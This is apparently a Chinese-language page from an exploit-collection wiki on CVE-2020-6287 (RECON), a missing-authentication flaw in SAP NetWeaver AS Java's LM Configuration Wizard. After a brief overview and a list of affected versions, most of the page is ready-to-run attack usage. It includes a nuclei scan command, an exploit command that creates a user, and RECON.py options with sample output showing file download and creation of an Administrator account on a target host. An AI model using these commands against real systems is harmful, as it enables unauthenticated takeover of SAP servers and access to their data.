menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right SAP chevron_right SAP NetWeaver AS JAVA 任意用户添加
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    SAP NetWeaver AS JavaLM配置向导中缺乏身份验证,未经身份验证的远程攻击者可以执行有危害的操作,包括但不限于创建管理员用户。攻击者可能获得对adm的访问权限,adm是操作系统用户,它可以无限制地访问与SAP系统相关的所有本地资源。

    影响范围

    SAP NetWeaver AS JAVA(LM Configuration Wizard)7.30
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.31
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.40
SAP NetWeaver AS JAVA(LM Configuration Wizard)7.50

    POC

    nuceli -tags sap -t cves/ -l urls.txt

    EXP

    python CVE-2020-6287.py http://vul-IP:50000/ test123 test@123123

    EXP (RECON.py)

    chipik/SAP_RECON Just point SAP NW AS Java hostnmae/ip.

    There is additional options:

    1. -c - check if SAP server is vulnerable to RECON
    2. -f - download zip file from SAP server
    3. -u - create user SAP JAVA user with Authenticated User role
    4. -a - create user SAP JAVA user with Administrator role

    Ex.: Download zip file

    python RECON.py -H 172.16.30.8 -f /1111.zip
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Ok! File zipfile_929.zip was saved

    Ex.: Create SAP JAVA user

    ~python RECON.py -H 172.16.30.8 -u
Check1 - Vulnerable! - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user. sapRpoc5484:Secure!PwD9379
Ok! User were created

    Ex.: Create SAP JAVA Administrator user

    ~python RECON.py -H 172.16.30.8 -a
Check1 - Vulnerable! [CVE-2020-6287] (RECON) - http://172.16.30.8:50000/CTCWebService/CTCWebServiceBean
Going to create new user sapRpoc5574:Secure!PwD7715 with role 'Administrator'
Ok! Admin user were created